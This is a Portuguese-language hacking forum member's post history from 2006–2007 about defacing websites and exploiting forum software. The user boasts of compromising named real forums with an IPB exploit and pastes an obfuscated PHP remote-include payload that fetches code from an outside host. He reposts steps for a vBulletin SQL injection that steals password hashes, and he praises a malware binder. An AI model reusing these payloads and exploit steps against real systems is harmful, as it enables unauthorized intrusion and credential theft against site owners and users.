Menu

Show posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Show posts Menu

Messages - Froz3nnn

#1
Darkers Project / Re: Black Rose
27 de December , 2007, 07:19:44 PM
Muito bom, acho legal sistemas de compartilhamento... melhor ainda um feio por usuarios do forum!
#2
Windows XP / Re: ctfmon.exe, onde mora o perigo
27 de December , 2007, 07:05:37 PM
Muito Bom!
Esse ctfmon.exe sempr eme intrigou.. eu não tinha o virús... ainda bem.

Obrigado!
#3
Eu acredito que não adianta usar outra variável para penetrar nest site... Acho que esse erro é do próprio SQL...

Se não for, alguém posta ajudando, aqui deuu uns 500 erros desse =X

Froz3nnn
#4
Defacement / Re: Postem seus defaces aqui!
07 de July , 2006, 06:27:22 PM
@f4kelive

Poderia esplicar como ataca por desktop remoto? Eu sempre tentei atacar sites desse estilo que você falou (http://munero-br.servegame.com:8090/) e nunca consegui...

Valeu e Obrigado.
#5
Meu deus, volto a dizer, esse binder está sensacional!
#6
Defacement / Re: Ownando um IPB 2.1.5 passo-a-passo
22 de June , 2006, 09:25:29 PM
http://www.gardensoccer.com/forums

:(
Se vocês souberem alguma coisa legal pra fazer me falem ?!

falou!
#7
Defacement / Re: Ownando um IPB 2.1.5 passo-a-passo
22 de June , 2006, 06:23:00 PM
Já tinha visto esse exploit!

Lembrando aos desinformados que se aparecer 00000000000000000000000000000000 quer dizer que o forum está patheado ou melhor, está sem essa vulnerabilidade!

.Froz3nnn
:)
#9
Penetration Tests / Re: Hackeando I.P.B 2.15
16 de June , 2006, 02:46:47 PM
@Emily

Eu tambem estou com esse exploit, mas eu nao to conseguindo achar o passwords pro e nem usa-lo :(

Do resto é muito bom o exploit
#10
Aew, consegui!
http://forum.brasilmanager.com.br/

Ele criou um tópico:

Justxpl
Justxpl

r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100).chr(46).chr(114).chr(117).chr(47).chr(114).chr(53).chr(55).chr(105).chr(112).chr(98).chr(105).chr(110).chr(99).chr(46).chr(116).chr(120).chr(116))); //

Agora eu não sei o que fazer comisso, desculpa a minha n00bice!
#11
Isso mesmo, só não sabia se estava certo...

Como você mesmo disse o ruim é ter direitos de moderador... e não é qm qualquer lugar que vc consegue eles.
Mas do resto ele é nota 10.

Falou!
#12
Eu testei uma vez no site: www.rabo-corneo.com (google plz ¬¬") o exploit fez tudo, mas a hora do "[~] Create new Message" ele fala: "[FAILED]"

Vou continuar tentando em outros fóruns, qualquer coisa eu posto aqui o resultado.

Falou
#13
Exploit para o VBulletin 3.0.8 ou menos.

What it does?
Extracts the username, password hash and salt of the specified user from a VBulletin board of version 3.0.8 or less.

Conditions
1.) Requires permissions to access moderator control panel
2.) Requires permissions to add/modify announcements
3.) The board must have remote posting enabled

How to use
1.) Copy the code below into a new html document.
2.) Modify the post action of the form to the server you wish to exploit.
3.) Load it into your web browser.
4.) Follow the instructions from there.

[Obs: Não traduzi para inglês pois não sei falar inglês para consertar os erros do tradutor!]

Exploit:

Quotehttp://www.w3.org/1999/xhtml" >

    Martin's modcp/Announcement.php SQL Injection


Martin's modcp/Announcement.php SQL Injection


Affects: Vbulletin <=3.0.8


http://www.m-s-d.net/


Conditions:


1.) You must be a moderator


2.) Remote posting must be enabled


Instructions:


1.) Modify the location of the form post in this file


2.) Create an announcement as per normal


3.) Ensure you are logged into the forum


4.) Fill out the form below and then press "Next" and "Launch Exploit"


5.) Read the modified announcement to get the password, hash and username








Fonte: h4ckyou.org
#14
@Rog

Utilizei o Binder e funcionou uma maravilha!

Se você quiser/precisar eu posso disponibilizar um sub-domínio com suporte PHP/MySQL e com Painel de controle pra você deixar 24 horas o Site... Já se você não quiser... eu to oferecendo!!

Falou... putz... binder nota 10
#15
Penetration Tests / Re: Crazy ip
15 de June , 2006, 04:35:32 PM
Olá, eu coloquei meu ip (201.1.67.23) e ele mostrou os seguintes resultados:

'Crazy IP' Encode Results
Host:    201.1.67.23
Regular IP:    201.1.67.23
Crazy IP:    3372303127

Falou, vou ir mudar meu IP agora ¬¬''